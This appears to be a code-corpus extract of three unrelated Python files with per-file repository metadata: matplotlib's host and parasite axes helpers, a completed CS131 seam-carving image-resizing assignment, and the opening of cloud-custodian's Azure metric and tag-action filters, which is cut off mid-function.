ParasiteAxesAuxTrans = parasite_axes_auxtrans_class_factory(ParasiteAxes)
class HostAxesBase:
def __init__(self, *args, **kwargs):
self.parasites = []
super().__init__(*args, **kwargs)
def get_aux_axes(self, tr=None, viewlim_mode="equal", axes_class=Axes):
"""
Add a parasite axes to this host.
Despite this method's name, this should actually be thought of as an
``add_parasite_axes`` method.
*tr* may be `.Transform`, in which case the following relation will
hold: ``parasite.transData = tr + host.transData``. Alternatively, it
may be None (the default), no special relationship will hold between
the parasite's and the host's ``transData``.
"""
parasite_axes_class = parasite_axes_class_factory(axes_class)
ax2 = parasite_axes_class(self, tr, viewlim_mode=viewlim_mode)
# note that ax2.transData == tr + ax1.transData
# Anything you draw in ax2 will match the ticks and grids of ax1.
self.parasites.append(ax2)
ax2._remove_method = self.parasites.remove
return ax2
def _get_legend_handles(self, legend_handler_map=None):
all_handles = super()._get_legend_handles()
for ax in self.parasites:
all_handles.extend(ax._get_legend_handles(legend_handler_map))
return all_handles
def draw(self, renderer):
orig_artists = list(self.artists)
orig_images = list(self.images)
if hasattr(self, "get_axes_locator"):
locator = self.get_axes_locator()
if locator:
pos = locator(self, renderer)
self.set_position(pos, which="active")
self.apply_aspect(pos)
else:
self.apply_aspect()
else:
self.apply_aspect()
rect = self.get_position()
for ax in self.parasites:
ax.apply_aspect(rect)
images, artists = ax.get_images_artists()
self.images.extend(images)
self.artists.extend(artists)
super().draw(renderer)
self.artists = orig_artists
self.images = orig_images
def cla(self):
for ax in self.parasites:
ax.cla()
super().cla()
def pick(self, mouseevent):
super().pick(mouseevent)
# Also pass pick events on to parasite axes and, in turn, their
# children (cf. ParasiteAxesBase.pick)
for a in self.parasites:
a.pick(mouseevent)
def twinx(self, axes_class=None):
"""
Create a twin of Axes with a shared x-axis but independent y-axis.
The y-axis of self will have ticks on the left and the returned axes
will have ticks on the right.
"""
ax = self._add_twin_axes(axes_class, sharex=self)
self.axis["right"].set_visible(False)
ax.axis["right"].set_visible(True)
ax.axis["left", "top", "bottom"].set_visible(False)
return ax
def twiny(self, axes_class=None):
"""
Create a twin of Axes with a shared y-axis but independent x-axis.
The x-axis of self will have ticks on the bottom and the returned axes
will have ticks on the top.
"""
ax = self._add_twin_axes(axes_class, sharey=self)
self.axis["top"].set_visible(False)
ax.axis["top"].set_visible(True)
ax.axis["left", "right", "bottom"].set_visible(False)
return ax
def twin(self, aux_trans=None, axes_class=None):
"""
Create a twin of Axes with no shared axis.
While self will have ticks on the left and bottom axis, the returned
axes will have ticks on the top and right axis.
"""
if aux_trans is None:
aux_trans = mtransforms.IdentityTransform()
ax = self._add_twin_axes(
axes_class, aux_transform=aux_trans, viewlim_mode="transform")
self.axis["top", "right"].set_visible(False)
ax.axis["top", "right"].set_visible(True)
ax.axis["left", "bottom"].set_visible(False)
return ax
def _add_twin_axes(self, axes_class, **kwargs):
"""
Helper for `.twinx`/`.twiny`/`.twin`.
*kwargs* are forwarded to the parasite axes constructor.
"""
if axes_class is None:
axes_class = self._get_base_axes()
ax = parasite_axes_class_factory(axes_class)(self, **kwargs)
self.parasites.append(ax)
ax._remove_method = self._remove_any_twin
return ax
def _remove_any_twin(self, ax):
self.parasites.remove(ax)
restore = ["top", "right"]
if ax._sharex:
restore.remove("top")
if ax._sharey:
restore.remove("right")
self.axis[tuple(restore)].set_visible(True)
self.axis[tuple(restore)].toggle(ticklabels=False, label=False)
def get_tightbbox(self, renderer, call_axes_locator=True,
bbox_extra_artists=None):
bbs = [
*[ax.get_tightbbox(renderer, call_axes_locator=call_axes_locator)
for ax in self.parasites],
super().get_tightbbox(renderer,
call_axes_locator=call_axes_locator,
bbox_extra_artists=bbox_extra_artists)]
return Bbox.union([b for b in bbs if b.width != 0 or b.height != 0])
@functools.lru_cache(None)
def host_axes_class_factory(axes_class=None):
if axes_class is None:
_api.warn_deprecated(
"3.3", message="Support for passing None to host_axes_class is "
"deprecated since %(since)s and will be removed %(removed)s; "
"explicitly pass the default Axes class instead.")
axes_class = Axes
def _get_base_axes(self):
return axes_class
return type("%sHostAxes" % axes_class.__name__,
(HostAxesBase, axes_class),
{'_get_base_axes': _get_base_axes})
def host_subplot_class_factory(axes_class):
host_axes_class = host_axes_class_factory(axes_class)
subplot_host_class = subplot_class_factory(host_axes_class)
return subplot_host_class
HostAxes = host_axes_class_factory(Axes)
SubplotHost = subplot_class_factory(HostAxes)
def host_axes(*args, axes_class=Axes, figure=None, **kwargs):
"""
Create axes that can act as a hosts to parasitic axes.
Parameters
----------
figure : `matplotlib.figure.Figure`
Figure to which the axes will be added. Defaults to the current figure
`.pyplot.gcf()`.
*args, **kwargs
Will be passed on to the underlying ``Axes`` object creation.
"""
import matplotlib.pyplot as plt
host_axes_class = host_axes_class_factory(axes_class)
if figure is None:
figure = plt.gcf()
ax = host_axes_class(figure, *args, **kwargs)
figure.add_axes(ax)
plt.draw_if_interactive()
return ax
def host_subplot(*args, axes_class=Axes, figure=None, **kwargs):
"""
Create a subplot that can act as a host to parasitic axes.
Parameters
----------
figure : `matplotlib.figure.Figure`
Figure to which the subplot will be added. Defaults to the current
figure `.pyplot.gcf()`.
*args, **kwargs
Will be passed on to the underlying ``Axes`` object creation.
"""
import matplotlib.pyplot as plt
host_subplot_class = host_subplot_class_factory(axes_class)
if figure is None:
figure = plt.gcf()
ax = host_subplot_class(figure, *args, **kwargs)
figure.add_subplot(ax)
plt.draw_if_interactive()
return ax
| 35.580563 | 78 | 0.643186 |
2fc43e895a66ed08c4272e696a4bb08c264b2157 | 19,037 | py | Python | fall_2020/hw5_release/seam_carving.py | Victarry/CS131_release | da6497e4a6aa158950ed87033e6188fc8107f9f8 | [
"MIT"
] | null | null | null | fall_2020/hw5_release/seam_carving.py | Victarry/CS131_release | da6497e4a6aa158950ed87033e6188fc8107f9f8 | [
"MIT"
] | null | null | null | fall_2020/hw5_release/seam_carving.py | Victarry/CS131_release | da6497e4a6aa158950ed87033e6188fc8107f9f8 | [
"MIT"
] | null | null | null | """
CS131 - Computer Vision: Foundations and Applications
Assignment 4
Author: Donsuk Lee (donlee90@stanford.edu)
Date created: 09/2017
Last modified: 10/16/2020
Python Version: 3.5+
"""
import numpy as np
from skimage import color
def energy_function(image):
"""Computes energy of the input image.
For each pixel, we will sum the absolute value of the gradient in each direction.
Don't forget to convert to grayscale first.
Hint: Use np.gradient here
Args:
image: numpy array of shape (H, W, 3)
Returns:
out: numpy array of shape (H, W)
"""
H, W, _ = image.shape
out = np.zeros((H, W))
gray_image = color.rgb2gray(image)
### YOUR CODE HERE
out = np.sum(np.abs(np.gradient(gray_image)), axis=0)
### END YOUR CODE
return out
def compute_cost(image, energy, axis=1):
"""Computes optimal cost map (vertical) and paths of the seams.
Starting from the first row, compute the cost of each pixel as the sum of energy along the
lowest energy path from the top.
We also return the paths, which will contain at each pixel either -1, 0 or 1 depending on
where to go up if we follow a seam at this pixel.
In the case that energies are equal, choose the left-most path. Note that
np.argmin returns the index of the first ocurring minimum of the specified
axis.
Make sure your code is vectorized because this function will be called a lot.
You should only have one loop iterating through the rows.
We also recommend you create a stacked matrix with left, middle, and right costs
to make your cost and paths calculations easier.
Args:
image: not used for this function
(this is to have a common interface with compute_forward_cost)
energy: numpy array of shape (H, W)
axis: compute cost in width (axis=1) or height (axis=0)
Returns:
cost: numpy array of shape (H, W)
paths: numpy array of shape (H, W) containing values -1 (up and left), 0 (straight up), or 1 (up and right)
"""
energy = energy.copy()
if axis == 0:
energy = np.transpose(energy, (1, 0))
H, W = energy.shape
cost = np.zeros((H, W))
paths = np.zeros((H, W), dtype=np.int)
# Initialization
cost[0] = energy[0]
paths[0] = 0 # we don't care about the first row of paths
### YOUR CODE HERE
left_cost = np.zeros(W)
left_cost[0] = float('inf')
middel_cost = np.zeros(W)
right_cost = np.zeros(W)
right_cost[-1] = float('inf')
for i in range(1, H):
left_cost[1:] = cost[i-1, :-1]
middel_cost = cost[i-1]
right_cost[:-1] = cost[i-1, 1:]
stacked_cost = np.stack([left_cost, middel_cost, right_cost], axis=0) # (W, 3)
cost[i] = np.min(stacked_cost, axis=0) + energy[i]
paths[i] = np.argmin(stacked_cost, axis=0)-1
### END YOUR CODE
if axis == 0:
cost = np.transpose(cost, (1, 0))
paths = np.transpose(paths, (1, 0))
# Check that paths only contains -1, 0 or 1
assert np.all(np.any([paths == 1, paths == 0, paths == -1], axis=0)), \
"paths contains other values than -1, 0 or 1"
return cost, paths
def backtrack_seam(paths, end):
"""Backtracks the paths map to find the seam ending at (H-1, end)
To do that, we start at the bottom of the image on position (H-1, end), and we
go up row by row by following the direction indicated by paths:
- left (value -1)
- middle (value 0)
- right (value 1)
Args:
paths: numpy array of shape (H, W) containing values -1, 0 or 1
end: the seam ends at pixel (H, end)
Returns:
seam: np.array of indices of shape (H,). The path pixels are the (i, seam[i])
"""
H, W = paths.shape
# initialize with -1 to make sure that everything gets modified
seam = - np.ones(H, dtype=np.int)
# Initialization
seam[H-1] = end
### YOUR CODE HERE
for i in range(H-2, -1, -1):
seam[i] = seam[i+1] + paths[i+1, seam[i+1]]
### END YOUR CODE
# Check that seam only contains values in [0, W-1]
assert np.all(np.all([seam >= 0, seam < W], axis=0)), "seam contains values out of bounds"
return seam
def remove_seam(image, seam):
"""Remove a seam from the image.
This function will be helpful for functions reduce and reduce_forward.
Args:
image: numpy array of shape (H, W, C) or shape (H, W)
seam: numpy array of shape (H,) containing indices of the seam to remove
Returns:
out: numpy array of shape (H, W-1, C) or shape (H, W-1)
make sure that `out` has same type as `image`
"""
# Add extra dimension if 2D input
if len(image.shape) == 2:
image = np.expand_dims(image, axis=2)
out = None
H, W, C = image.shape
### YOUR CODE HERE
out = np.zeros((H, W-1, C), dtype=image.dtype)
for i in range(H):
out[i] = np.concatenate([image[i, :seam[i]], image[i, seam[i]+1:]], axis=0)
### END YOUR CODE
out = np.squeeze(out) # remove last dimension if C == 1
# Make sure that `out` has same type as `image`
assert out.dtype == image.dtype, \
"Type changed between image (%s) and out (%s) in remove_seam" % (image.dtype, out.dtype)
return out
def reduce(image, size, axis=1, efunc=energy_function, cfunc=compute_cost, bfunc=backtrack_seam, rfunc=remove_seam):
"""Reduces the size of the image using the seam carving process.
At each step, we remove the lowest energy seam from the image. We repeat the process
until we obtain an output of desired size.
SUPER IMPORTANT: IF YOU WANT TO PREVENT CASCADING ERRORS IN THE CODE OF reduce(), USE FUNCTIONS:
- efunc (instead of energy_function)
- cfunc (instead of compute_cost)
- bfunc (instead of backtrack_seam)
- rfunc (instead of remove_seam)
Args:
image: numpy array of shape (H, W, 3)
size: size to reduce height or width to (depending on axis)
axis: reduce in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
bfunc: backtrack seam function to use
rfunc: remove seam function to use
Returns:
out: numpy array of shape (size, W, 3) if axis=0, or (H, size, 3) if axis=1
"""
out = np.copy(image)
if axis == 0:
out = np.transpose(out, (1, 0, 2))
H = out.shape[0]
W = out.shape[1]
assert W > size, "Size must be smaller than %d" % W
assert size > 0, "Size must be greater than zero"
### YOUR CODE HERE
for i in range(W-size):
energy = efunc(out)
cost, paths = cfunc(out, energy)
seam = bfunc(paths, np.argmin(cost[-1]))
out = rfunc(out, seam)
### END YOUR CODE
assert out.shape[1] == size, "Output doesn't have the right shape"
if axis == 0:
out = np.transpose(out, (1, 0, 2))
return out
def duplicate_seam(image, seam):
"""Duplicates pixels of the seam, making the pixels on the seam path "twice larger".
This function will be helpful in functions enlarge_naive and enlarge.
Args:
image: numpy array of shape (H, W, C)
seam: numpy array of shape (H,) of indices
Returns:
out: numpy array of shape (H, W+1, C)
"""
H, W, C = image.shape
out = np.zeros((H, W + 1, C))
### YOUR CODE HERE
for i in range(H):
out[i] = np.concatenate([image[i, :seam[i]+1], image[i, seam[i]:]], axis=0)
### END YOUR CODE
return out
def enlarge_naive(image, size, axis=1, efunc=energy_function, cfunc=compute_cost, bfunc=backtrack_seam, dfunc=duplicate_seam):
"""Increases the size of the image using the seam duplication process.
At each step, we duplicate the lowest energy seam from the image. We repeat the process
until we obtain an output of desired size.
SUPER IMPORTANT: IF YOU WANT TO PREVENT CASCADING ERRORS IN THE CODE OF enlarge_naive(), USE FUNCTIONS:
- efunc (instead of energy_function)
- cfunc (instead of compute_cost)
- bfunc (instead of backtrack_seam)
- dfunc (instead of duplicate_seam)
Args:
image: numpy array of shape (H, W, C)
size: size to increase height or width to (depending on axis)
axis: increase in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
bfunc: backtrack seam function to use
dfunc: duplicate seam function to use
Returns:
out: numpy array of shape (size, W, C) if axis=0, or (H, size, C) if axis=1
"""
out = np.copy(image)
if axis == 0:
out = np.transpose(out, (1, 0, 2))
H = out.shape[0]
W = out.shape[1]
assert size > W, "size must be greather than %d" % W
### YOUR CODE HERE
for i in range(size-W):
energy = efunc(out)
cost, paths = cfunc(out, energy)
seam = bfunc(paths, np.argmin(cost[-1]))
out = dfunc(out, seam)
### END YOUR CODE
if axis == 0:
out = np.transpose(out, (1, 0, 2))
return out
def find_seams(image, k, axis=1, efunc=energy_function, cfunc=compute_cost, bfunc=backtrack_seam, rfunc=remove_seam):
"""Find the top k seams (with lowest energy) in the image.
We act like if we remove k seams from the image iteratively, but we need to store their
position to be able to duplicate them in function enlarge.
We keep track of where the seams are in the original image with the array seams, which
is the output of find_seams.
We also keep an indices array to map current pixels to their original position in the image.
SUPER IMPORTANT: IF YOU WANT TO PREVENT CASCADING ERRORS IN THE CODE OF find_seams(), USE FUNCTIONS:
- efunc (instead of energy_function)
- cfunc (instead of compute_cost)
- bfunc (instead of backtrack_seam)
- rfunc (instead of remove_seam)
Args:
image: numpy array of shape (H, W, C)
k: number of seams to find
axis: find seams in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
bfunc: backtrack seam function to use
rfunc: remove seam function to use
Returns:
seams: numpy array of shape (H, W)
"""
image = np.copy(image)
if axis == 0:
image = np.transpose(image, (1, 0, 2))
H, W, C = image.shape
assert W > k, "k must be smaller than %d" % W
# Create a map to remember original pixel indices
# At each step, indices[row, col] will be the original column of current pixel
# The position in the original image of this pixel is: (row, indices[row, col])
# We initialize `indices` with an array like (for shape (2, 4)):
# [[1, 2, 3, 4],
# [1, 2, 3, 4]]
indices = np.tile(range(W), (H, 1)) # shape (H, W)
# We keep track here of the seams removed in our process
# At the end of the process, seam number i will be stored as the path of value i+1 in `seams`
# An example output for `seams` for two seams in a (3, 4) image can be:
# [[0, 1, 0, 2],
# [1, 0, 2, 0],
# [1, 0, 0, 2]]
seams = np.zeros((H, W), dtype=np.int)
# Iteratively find k seams for removal
for i in range(k):
# Get the current optimal seam
energy = efunc(image)
cost, paths = cfunc(image, energy)
end = np.argmin(cost[H - 1])
seam = bfunc(paths, end)
# Remove that seam from the image
image = rfunc(image, seam)
# Store the new seam with value i+1 in the image
# We can assert here that we are only writing on zeros (not overwriting existing seams)
assert np.all(seams[np.arange(H), indices[np.arange(H), seam]] == 0), \
"we are overwriting seams"
seams[np.arange(H), indices[np.arange(H), seam]] = i + 1
# We remove the indices used by the seam, so that `indices` keep the same shape as `image`
indices = rfunc(indices, seam)
if axis == 0:
seams = np.transpose(seams, (1, 0))
return seams
def enlarge(image, size, axis=1, efunc=energy_function, cfunc=compute_cost, dfunc=duplicate_seam, bfunc=backtrack_seam, rfunc=remove_seam):
"""Enlarges the size of the image by duplicating the low energy seams.
We start by getting the k seams to duplicate through function find_seams.
We iterate through these seams and duplicate each one iteratively.
SUPER IMPORTANT: IF YOU WANT TO PREVENT CASCADING ERRORS IN THE CODE OF enlarge(), USE FUNCTIONS:
- efunc (instead of energy_function)
- cfunc (instead of compute_cost)
- dfunc (instead of duplicate_seam)
- bfunc (instead of backtrack_seam)
- rfunc (instead of remove_seam)
- find_seams
Args:
image: numpy array of shape (H, W, C)
size: size to reduce height or width to (depending on axis)
axis: enlarge in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
dfunc: duplicate seam function to use
bfunc: backtrack seam function to use
rfunc: remove seam function to use
Returns:
out: numpy array of shape (size, W, C) if axis=0, or (H, size, C) if axis=1
"""
out = np.copy(image)
# Transpose for height resizing
if axis == 0:
out = np.transpose(out, (1, 0, 2))
H, W, C = out.shape
assert size > W, "size must be greather than %d" % W
assert size <= 2 * W, "size must be smaller than %d" % (2 * W)
### YOUR CODE HERE
energy = efunc(out)
cost, paths = cfunc(out, energy)
seams = find_seams(out, size-W, efunc=efunc, cfunc=cfunc, bfunc=bfunc, rfunc=rfunc) # (H, W)
# add seam from right to left, so how to find right-most seam
cur_index = W-1
while cur_index >= 0:
seam_id = seams[0, cur_index]
if seam_id != 0:
seam = np.where(seams == seam_id)[1]
out = dfunc(out, seam)
cur_index -= 1
### END YOUR CODE
if axis == 0:
out = np.transpose(out, (1, 0, 2))
return out
def compute_forward_cost(image, energy):
"""Computes forward cost map (vertical) and paths of the seams.
Starting from the first row, compute the cost of each pixel as the sum of energy along the
lowest energy path from the top.
Make sure to add the forward cost introduced when we remove the pixel of the seam.
We also return the paths, which will contain at each pixel either -1, 0 or 1 depending on
where to go up if we follow a seam at this pixel.
Args:
image: numpy array of shape (H, W, 3) or (H, W)
energy: numpy array of shape (H, W)
Returns:
cost: numpy array of shape (H, W)
paths: numpy array of shape (H, W) containing values -1, 0 or 1
"""
image = color.rgb2gray(image)
H, W = image.shape
cost = np.zeros((H, W))
paths = np.zeros((H, W), dtype=np.int)
# Initialization
cost[0] = energy[0]
for j in range(W):
if j > 0 and j < W - 1:
cost[0, j] += np.abs(image[0, j+1] - image[0, j-1])
paths[0] = 0 # we don't care about the first row of paths
### YOUR CODE HERE
# refer to this blog https://avikdas.com/2019/07/29/improved-seam-carving-with-forward-energy.html
# but energy of each location should also be included
for i in range(1, H):
C_l = np.zeros(W)
C_u = np.zeros(W)
C_r = np.zeros(W)
C_u[1:-1] = np.abs(image[i, :-2]-image[i, 2:])
C_u = C_u + energy[i] + cost[i-1]
C_l[1:-1] = np.abs(image[i, :-2]-image[i, 2:]) + np.abs(image[i, :-2] - image[i-1, 1:-1])
C_l[-1] = np.abs(image[i, -2] - image[i-1, -1])
C_l[1:] = C_l[1:] + energy[i, 1:] + cost[i-1, :-1]
C_l[0] = float('inf')
C_r[1:-1] = np.abs(image[i, :-2]-image[i, 2:]) + np.abs(image[i, 1:-1] - image[i-1, 2:])
C_r[0] = np.abs(image[i, 0] - image[i-1, 1])
C_r[:-1] = C_r[:-1] + energy[i, :-1] + cost[i-1, 1:]
C_r[-1] = float('inf')
stacked_cost = np.stack((C_l, C_u, C_r), axis=0)
cost[i] = np.min(stacked_cost, axis=0)
paths[i] = np.argmin(stacked_cost, axis=0) - 1
### END YOUR CODE
# Check that paths only contains -1, 0 or 1
assert np.all(np.any([paths == 1, paths == 0, paths == -1], axis=0)), \
"paths contains other values than -1, 0 or 1"
return cost, paths
def reduce_fast(image, size, axis=1, efunc=energy_function, cfunc=compute_cost):
"""Reduces the size of the image using the seam carving process. Faster than `reduce`.
Use your own implementation (you can use auxiliary functions if it helps like `energy_fast`)
to implement a faster version of `reduce`.
Args:
image: numpy array of shape (H, W, C)
size: size to reduce height or width to (depending on axis)
axis: reduce in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
Returns:
out: numpy array of shape (size, W, C) if axis=0, or (H, size, C) if axis=1
"""
out = np.copy(image)
if axis == 0:
out = np.transpose(out, (1, 0, 2))
H = out.shape[0]
W = out.shape[1]
assert W > size, "Size must be smaller than %d" % W
assert size > 0, "Size must be greater than zero"
### YOUR CODE HERE
for i in range(W-size):
energy = efunc(out)
cost, paths = cfunc(out, energy)
seam = backtrack_seam(paths, np.argmin(cost[-1]))
out = remove_seam(out, seam)
### END YOUR CODE
assert out.shape[1] == size, "Output doesn't have the right shape"
if axis == 0:
out = np.transpose(out, (1, 0, 2))
return out
def remove_object(image, mask):
"""Remove the object present in the mask.
Returns an output image with same shape as the input image, but without the object in the mask.
Args:
image: numpy array of shape (H, W, 3)
mask: numpy boolean array of shape (H, W)
Returns:
out: numpy array of shape (H, W, 3)
"""
assert image.shape[:2] == mask.shape
H, W, _ = image.shape
out = np.copy(image)
### YOUR CODE HERE
def energy_mask(image):
energy = energy_function(image)
energy[mask] = -100
return energy
def mask_remove_seam(image, seam):
out = remove_seam(image, seam)
nonlocal mask
mask = remove_seam(mask, seam)
return out
from scipy import ndimage
mask_box = ndimage.find_objects(mask)[0]
mask_h = mask_box[0].stop - mask_box[0].start + 1
mask_w = mask_box[1].stop - mask_box[1].start + 1
out = reduce(image, W-mask_w, 1, energy_mask, compute_cost, rfunc=mask_remove_seam)
out = enlarge(out, W, axis=1)
### END YOUR CODE
assert out.shape == image.shape
return out
| 32.266102 | 139 | 0.612281 |
ac25259cd7340f2f8478a12b051fd056fee988ad | 35,409 | py | Python | tools/c7n_azure/c7n_azure/filters.py | MehdiZonjy/cloud-custodian | 9185eda70c4ee4d14190e62290ecfdf229ef42ff | [
"Apache-2.0"
] | 2 | 2017-09-20T15:43:40.000Z | 2018-12-22T12:03:07.000Z | tools/c7n_azure/c7n_azure/filters.py | MehdiZonjy/cloud-custodian | 9185eda70c4ee4d14190e62290ecfdf229ef42ff | [
"Apache-2.0"
] | 2 | 2018-01-20T01:36:39.000Z | 2021-02-01T15:35:33.000Z | tools/c7n_azure/c7n_azure/filters.py | MehdiZonjy/cloud-custodian | 9185eda70c4ee4d14190e62290ecfdf229ef42ff | [
"Apache-2.0"
] | 3 | 2017-09-21T13:36:46.000Z | 2021-09-20T16:38:29.000Z | # Copyright 2015-2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import isodate
import operator
from abc import ABCMeta, abstractmethod
from concurrent.futures import as_completed
from datetime import timedelta
import six
from azure.mgmt.costmanagement.models import (QueryAggregation,
QueryComparisonExpression,
QueryDataset, QueryDefinition,
QueryFilter, QueryGrouping,
QueryTimePeriod, TimeframeType)
from azure.mgmt.policyinsights import PolicyInsightsClient
from c7n_azure.tags import TagHelper
from c7n_azure.utils import (IpRangeHelper, Math, ResourceIdParser,
StringUtils, ThreadHelper, now, utcnow, is_resource_group)
from dateutil.parser import parse
from msrest.exceptions import HttpOperationError
from c7n.filters import Filter, FilterValidationError, ValueFilter
from c7n.filters.core import PolicyValidationError
from c7n.filters.offhours import OffHour, OnHour, Time
from c7n.utils import chunks, get_annotation_prefix, type_schema
scalar_ops = {
'eq': operator.eq,
'equal': operator.eq,
'ne': operator.ne,
'not-equal': operator.ne,
'gt': operator.gt,
'greater-than': operator.gt,
'ge': operator.ge,
'gte': operator.ge,
'le': operator.le,
'lte': operator.le,
'lt': operator.lt,
'less-than': operator.lt
}
class MetricFilter(Filter):
"""
Filters Azure resources based on live metrics from the Azure monitor
Click `here
<https://docs.microsoft.com/en-us/azure/monitoring-and-diagnostics/monitoring-supported-metrics/>`_
for a full list of metrics supported by Azure resources.
:example:
Find all VMs with an average Percentage CPU greater than 75% over last 2 hours
.. code-block:: yaml
policies:
- name: vm-percentage-cpu
resource: azure.vm
filters:
- type: metric
metric: Percentage CPU
aggregation: average
op: gt
threshold: 75
timeframe: 2
:example:
Find KeyVaults with more than 1000 API hits in the last hour
.. code-block:: yaml
policies:
- name: keyvault-hits
resource: azure.keyvault
filters:
- type: metric
metric: ServiceApiHit
aggregation: total
op: gt
threshold: 1000
timeframe: 1
:example:
Find SQL servers with less than 10% average DTU consumption
across all databases over last 24 hours
.. code-block:: yaml
policies:
- name: dtu-consumption
resource: azure.sqlserver
filters:
- type: metric
metric: dtu_consumption_percent
aggregation: average
op: lt
threshold: 10
timeframe: 24
filter: "DatabaseResourceId eq '*'"
"""
DEFAULT_TIMEFRAME = 24
DEFAULT_INTERVAL = 'P1D'
DEFAULT_AGGREGATION = 'average'
aggregation_funcs = {
'average': Math.mean,
'total': Math.sum,
'count': Math.sum,
'minimum': Math.max,
'maximum': Math.min
}
schema = {
'type': 'object',
'required': ['type', 'metric', 'op', 'threshold'],
'additionalProperties': False,
'properties': {
'type': {'enum': ['metric']},
'metric': {'type': 'string'},
'op': {'enum': list(scalar_ops.keys())},
'threshold': {'type': 'number'},
'timeframe': {'type': 'number'},
'interval': {'enum': [
'PT1M', 'PT5M', 'PT15M', 'PT30M', 'PT1H', 'PT6H', 'PT12H', 'P1D']},
'aggregation': {'enum': ['total', 'average', 'count', 'minimum', 'maximum']},
'no_data_action': {'enum': ['include', 'exclude']},
'filter': {'type': 'string'}
}
}
schema_alias = True
def __init__(self, data, manager=None):
super(MetricFilter, self).__init__(data, manager)
# Metric name as defined by Azure SDK
self.metric = self.data.get('metric')
# gt (>), ge (>=), eq (==), le (<=), lt (<)
self.op = scalar_ops[self.data.get('op')]
# Value to compare metric value with self.op
self.threshold = self.data.get('threshold')
# Number of hours from current UTC time
self.timeframe = float(self.data.get('timeframe', self.DEFAULT_TIMEFRAME))
# Interval as defined by Azure SDK
self.interval = isodate.parse_duration(self.data.get('interval', self.DEFAULT_INTERVAL))
# Aggregation as defined by Azure SDK
self.aggregation = self.data.get('aggregation', self.DEFAULT_AGGREGATION)
# Aggregation function to be used locally
self.func = self.aggregation_funcs[self.aggregation]
# Used to reduce the set of metric data returned
self.filter = self.data.get('filter', None)
# Include or exclude resources if there is no metric data available
self.no_data_action = self.data.get('no_data_action', 'exclude')
def process(self, resources, event=None):
# Import utcnow function as it may have been overridden for testing purposes
from c7n_azure.utils import utcnow
# Get timespan
end_time = utcnow()
start_time = end_time - timedelta(hours=self.timeframe)
self.timespan = "{}/{}".format(start_time, end_time)
# Create Azure Monitor client
self.client = self.manager.get_client('azure.mgmt.monitor.MonitorManagementClient')
# Process each resource in a separate thread, returning all that pass filter
with self.executor_factory(max_workers=3) as w:
processed = list(w.map(self.process_resource, resources))
return [item for item in processed if item is not None]
def get_metric_data(self, resource):
cached_metric_data = self._get_cached_metric_data(resource)
if cached_metric_data:
return cached_metric_data['measurement']
try:
metrics_data = self.client.metrics.list(
self.get_resource_id(resource),
timespan=self.timespan,
interval=self.interval,
metricnames=self.metric,
aggregation=self.aggregation,
filter=self.get_filter(resource)
)
except HttpOperationError:
self.log.exception("Could not get metric: %s on %s" % (
self.metric, resource['id']))
return None
if len(metrics_data.value) > 0 and len(metrics_data.value[0].timeseries) > 0:
m = [getattr(item, self.aggregation)
for item in metrics_data.value[0].timeseries[0].data]
else:
m = None
self._write_metric_to_resource(resource, metrics_data, m)
return m
def get_resource_id(self, resource):
return resource['id']
def get_filter(self, resource):
return self.filter
def _write_metric_to_resource(self, resource, metrics_data, m):
resource_metrics = resource.setdefault(get_annotation_prefix('metrics'), {})
resource_metrics[self._get_metrics_cache_key()] = {
'metrics_data': metrics_data.as_dict(),
'measurement': m,
}
def _get_metrics_cache_key(self):
return "{}, {}, {}, {}, {}".format(
self.metric,
self.aggregation,
self.timeframe,
self.interval,
self.filter,
)
def _get_cached_metric_data(self, resource):
metrics = resource.get(get_annotation_prefix('metrics'))
if not metrics:
return None
return metrics.get(self._get_metrics_cache_key())
def passes_op_filter(self, resource):
m_data = self.get_metric_data(resource)
if m_data is None:
return self.no_data_action == 'include'
aggregate_value = self.func(m_data)
return self.op(aggregate_value, self.threshold)
def process_resource(self, resource):
return resource if self.passes_op_filter(resource) else None
DEFAULT_TAG = "custodian_status"
class TagActionFilter(Filter):
"""Filter resources for tag specified future action
Filters resources by a 'custodian_status' tag which specifies a future
date for an action.
The filter parses the tag values looking for an 'op@date'
string. The date is parsed and compared to do today's date, the
filter succeeds if today's date is gte to the target date.
The optional 'skew' parameter provides for incrementing today's
date a number of days into the future. An example use case might
be sending a final notice email a few days before terminating an
instance, or snapshotting a volume prior to deletion.
The optional 'skew_hours' parameter provides for incrementing the current
time a number of hours into the future.
Optionally, the 'tz' parameter can get used to specify the timezone
in which to interpret the clock (default value is 'utc')
:example:
.. code-block :: yaml
policies:
- name: vm-stop-marked
resource: azure.vm
filters:
- type: marked-for-op
# The default tag used is custodian_status
# but that is configurable
tag: custodian_status
op: stop
# Another optional tag is skew
tz: utc
"""
schema = type_schema(
'marked-for-op',
tag={'type': 'string'},
tz={'type': 'string'},
skew={'type': 'number', 'minimum': 0},
skew_hours={'type': 'number', 'minimum': 0},
op={'type': 'string'})
schema_alias = True
current_date = None
log = logging.getLogger('custodian.azure.filters.TagActionFilter')
def validate(self):
op = self.data.get('op')
if self.manager and op not in self.manager.action_registry.keys():
raise PolicyValidationError(
"Invalid marked-for-op op:%s in %s" % (op, self.manager.data))
tz = Time.get_tz(self.data.get('tz', 'utc'))
if not tz:
raise PolicyValidationError(
"Invalid timezone specified '%s' in %s" % (
self.data.get('tz'), self.manager.data))
return self
def process(self, resources, event=None):
self.tag = self.data.get('tag', DEFAULT_TAG)
self.op = self.data.get('op', 'stop')
self.skew = self.data.get('skew', 0)
self.skew_hours = self.data.get('skew_hours', 0)
self.tz = Time.get_tz(self.data.get('tz', 'utc'))
return super(TagActionFilter, self).process(resources, event)
def __call__(self, i):
v = i.get('tags', {}).get(self.tag, None)
if v is None:
return False
if ':' not in v or '@' not in v:
return False
msg, tgt = v.rsplit(':', 1)
action, action_date_str = tgt.strip().split('@', 1)
if action != self.op:
return False
try:
action_date = parse(action_date_str)
except Exception:
self.log.error("could not parse tag:%s value:%s on %s" % (
self.tag, v, i['InstanceId']))
return False
# current_date must match timezones with the parsed date string
